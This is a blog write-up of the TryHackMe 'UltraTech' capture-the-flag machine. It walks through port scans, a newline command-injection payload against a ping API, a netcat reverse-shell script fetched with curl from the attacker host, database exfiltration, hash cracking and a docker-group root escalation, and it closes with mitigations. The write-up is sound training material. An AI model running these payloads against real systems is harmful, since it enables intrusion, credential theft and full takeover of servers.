UltraTech Write-up

Description

“UltraTech” is a boot2root machine on TryHackMe. It has intermediate difficulty. You have been contracted by UltraTech to pentest their infrastructure. It is a grey-box kind of assessment, the only information you have is the company’s name and their server’s IP address.

Initial access to the machine could be obtained through a command injection vulnerability in the API. After that credentials could be dumped from a SQLITE database file. The hashed passwords could be cracked. The credentials were used to escalate privileges to another user on the box. The user was inside the docker group. This was used to escalate the privileges further to root.

Enumeration

First of all an Nmap scan was used to scan all ports on the target machine.

sudo nmap -p- -oN nmap/all -vv 10.10.29.189

In the next step, version enumeration, script scanning and OS enumeration were conducted on the previously discovered ports with Nmap.

sudo nmap -p21,22,8081,31331 -sC -sV -O 10.10.29.189 -oN nmap/scripts -vv

The landing page of the web service on port 8081 showed an API running.

On port 31331 the company web site was served.

A robots.txt file could be found on the web page. This file revealed that there is a file called “utech_sitemap.txt”.

The sitemap revealed further “hidden” pages.

The interesting page here is “partners.html”. This page contains a login form.

Also by inspecting the web page’s source code, the following JavaScript code was loaded from the URL “http://10.10.29.189:31331/js/api.js”.

If a user tries to login, the credentials are send to “http://10.10.29.189:8081/auth”. Furthermore the web app was calling the URL “http://10.10.29.189:8081/ping?ip=10.10.29.189” to check if the API is still running. It was possible to ping the attacker machine by changing the ip parameter.

Pinging the attacker machine
Receiving the ping

The filter on the parameter ip could be evaded by following payload:

http://10.10.29.189:8081/ping?ip=127.0.0.1%20%0a%20id

Initial Access

The following bash script was created and served by the attacker via HTTP.

#!/bin/bash

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.9.73.174 443 >/tmp/f

The file was then uploaded to the victim by calling the following URL

http://10.10.29.189:8081/ping?ip=127.0.0.1%20%0a%20curl%20http://<attacker ip>/shell.sh%20-o%20shell.sh

After calling the following URL, the victim connected to a Netcat listener of the attacker.

http://10.10.29.189:8081/ping?ip=127.0.0.1%20%0A%20bash%20shell.sh

After getting the shell, there was a SQLITE database file inside the current working directory. This file has been exfiltrated to be able to analyze it.

SQLITE database file
Exfiltration via netcat

The SQLITE database contained MD5 hashes of two users.

Both password hashes could be successfully cracked with Crackstation.

Privilege Escalation to r00t

“r00t” is also a user on the box. A privilege escalation to “r00t” was possible because of a password reuse.

At this point it was also possible to login via SSH to the service with r00t’s credentials. Furthermore the r00t user is in the “docker” group as you can see in the above picture.

Privilege Escalation

The privilege escalation could be accomplished by abusing the docker command.

docker run -v /root:/mnt -it bash

Mitigation

The filter on the API should be hardened. Furthermore functionality that is not ready to use, should not be deployed on a live machine. Also passwords should not be hashed with the MD5 hash function. An appropriate password hashing function should be used instead, e.g. PBKDF2. Also the password policy should prohibit the use of common passwords. The reuse of password should also be prohibited. Users of the organization should be encouraged to follow the password policy. Also keep in mind that adding a user to the docker group, will also give them root rights. The user r00t should not be in the docker group if not needed.

--

--

--

Passionate about Cyber Security. I am publishing CTF writeups and Cybersecurity content!

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Implementing Information Security Policy the right way!

Goldfinch is a decentralized protocol that allows for crypto borrowing without crypto collateral.

What is decentralized storage and how does it work?

Basic SSH Security

TryHackMe: RP Nmap — Write-Up

Ground-breaking IoT Trends that will Rule the Market in 2021

SUNFLOWER (SFT) will be listed on JERITEX on March 15, 2022.

{UPDATE} Sirena Para Colorear Hack Free Resources Generator

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Rabbit

Rabbit

Passionate about Cyber Security. I am publishing CTF writeups and Cybersecurity content!

More from Medium

THM — Lockdown Write-Up

Tryhackme Archangel Writeup

TryHackMe | Overpass 2 — Hacked

Shocker HTB Writeup